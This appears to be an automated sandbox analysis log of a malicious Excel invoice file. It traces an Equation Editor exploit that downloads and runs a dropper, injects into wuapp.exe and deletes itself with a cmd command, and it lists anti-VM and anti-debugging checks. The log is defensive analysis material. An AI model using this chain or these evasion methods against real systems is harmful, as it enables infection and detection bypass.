          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00860078 NtResumeThread,LdrInitializeThunk,6_2_00860078
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008607AC NtCreateMutant,LdrInitializeThunk,6_2_008607AC
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085F9F0 NtClose,LdrInitializeThunk,6_2_0085F9F0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085F900 NtReadFile,LdrInitializeThunk,6_2_0085F900
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0085FAD0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0085FAE8
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_0085FBB8
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0085FB68
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_0085FC90
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_0085FC60
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FD8C NtDelayExecution,LdrInitializeThunk,6_2_0085FD8C
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0085FDC0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_0085FEA0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0085FED0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0085FFB4 NtCreateSection,LdrInitializeThunk,6_2_0085FFB4
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008610D0 NtOpenProcessToken,6_2_008610D0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00860060 NtQuerySection,6_2_00860060
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_008601D4 NtSetValueKey,6_2_008601D4
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0086010C NtOpenDirectoryObject,6_2_0086010C
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00861148 NtOpenThread,6_2_00861148
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA00C4 NtCreateFile,LdrInitializeThunk,8_2_01EA00C4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA07AC NtCreateMutant,LdrInitializeThunk,8_2_01EA07AC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9F9F0 NtClose,LdrInitializeThunk,8_2_01E9F9F0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9F900 NtReadFile,LdrInitializeThunk,8_2_01E9F900
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_01E9FBB8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01E9FB68
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FB50 NtCreateKey,LdrInitializeThunk,8_2_01E9FB50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_01E9FAE8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_01E9FAD0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FAB8 NtQueryValueKey,LdrInitializeThunk,8_2_01E9FAB8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01E9FDC0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FD8C NtDelayExecution,LdrInitializeThunk,8_2_01E9FD8C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_01E9FC60
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FFB4 NtCreateSection,LdrInitializeThunk,8_2_01E9FFB4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_01E9FED0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA01D4 NtSetValueKey,8_2_01EA01D4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA1148 NtOpenThread,8_2_01EA1148
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA010C NtOpenDirectoryObject,8_2_01EA010C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA10D0 NtOpenProcessToken,8_2_01EA10D0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA0060 NtQuerySection,8_2_01EA0060
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA0078 NtResumeThread,8_2_01EA0078
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA0048 NtProtectVirtualMemory,8_2_01EA0048
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9F938 NtWriteFile,8_2_01E9F938
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA1930 NtSetContextThread,8_2_01EA1930
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9F8CC NtWaitForSingleObject,8_2_01E9F8CC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FBE8 NtQueryVirtualMemory,8_2_01E9FBE8
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FA50 NtEnumerateValueKey,8_2_01E9FA50
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FA20 NtQueryInformationFile,8_2_01E9FA20
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA1D80 NtSuspendThread,8_2_01EA1D80
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FD5C NtEnumerateKey,8_2_01E9FD5C
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FC90 NtUnmapViewOfSection,8_2_01E9FC90
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FC48 NtSetInformationFile,8_2_01E9FC48
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EA0C40 NtGetContextThread,8_2_01EA0C40
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FC30 NtOpenProcess,8_2_01E9FC30
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FFFC NtCreateProcessEx,8_2_01E9FFFC
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FF34 NtQueueApcThread,8_2_01E9FF34
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FEA0 NtReadVirtualMemory,8_2_01E9FEA0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01E9FE24 NtWriteVirtualMemory,8_2_01E9FE24
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A2D0 NtCreateFile,8_2_0012A2D0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A380 NtReadFile,8_2_0012A380
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A400 NtClose,8_2_0012A400
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A4B0 NtAllocateVirtualMemory,8_2_0012A4B0
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A28A NtCreateFile,8_2_0012A28A
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A2CA NtCreateFile,8_2_0012A2CA
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012A4AA NtAllocateVirtualMemory,8_2_0012A4AA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: DL03327INV.xlsxVirustotal: Detection: 38%
          Source: DL03327INV.xlsxReversingLabs: Detection: 26%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgnaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgnaJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DL03327INV.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6B01.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/16@5/5
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,4_2_004021AA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404ABB
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
          Source: Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B2445 push ecx; ret 5_2_013B2458
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041E9FF push dword ptr [2E33947Ah]; ret 6_2_0041E9FB
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041D5D5 push eax; ret 6_2_0041D628
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041D622 push eax; ret 6_2_0041D628
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041D62B push eax; ret 6_2_0041D692
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041D68C push eax; ret 6_2_0041D692
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_0041E79A push dword ptr [2E33947Ah]; ret 6_2_0041E9FB
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_013B2445 push ecx; ret 6_2_013B2458
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01EADFA1 push ecx; ret 8_2_01EADFB4
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012F1B1 push esi; retf 8_2_0012F1B2
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012D5D5 push eax; ret 8_2_0012D628
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012D622 push eax; ret 8_2_0012D628
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012D62B push eax; ret 8_2_0012D692
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012D68C push eax; ret 8_2_0012D692
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012E79A push dword ptr [2E33947Ah]; ret 8_2_0012E9FB
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_0012E9FF push dword ptr [2E33947Ah]; ret 8_2_0012E9FB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\yldnat.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04FF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_013B1890
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wuapp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_5-6528
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeRDTSC instruction interceptor: First address: 0000000000408BB4 second address: 0000000000408BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeRDTSC instruction interceptor: First address: 0000000000408F3E second address: 0000000000408F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000118BB4 second address: 0000000000118BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000118F3E second address: 0000000000118F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1500Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-6980
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 6_2_00408E70 rdtsc 6_2_00408E70
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2887
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2346
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2390
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2343
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2368
          Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-3510
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeAPI call chain: ExitProcess graph end nodegraph_5-6982
          Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: EQNEDT32.EXE, 00000002.00000002.971587463.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
          Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.995482654.0000000000964000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000
          Source: explorer.exe, 00000007.00000000.1002709372.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.995370512.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e
          Source: explorer.exe, 00000007.00000000.995128220.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exeCode function: 5_2_013B1D2C _memset,IsDebuggerPresent,5_2_013B1D2C
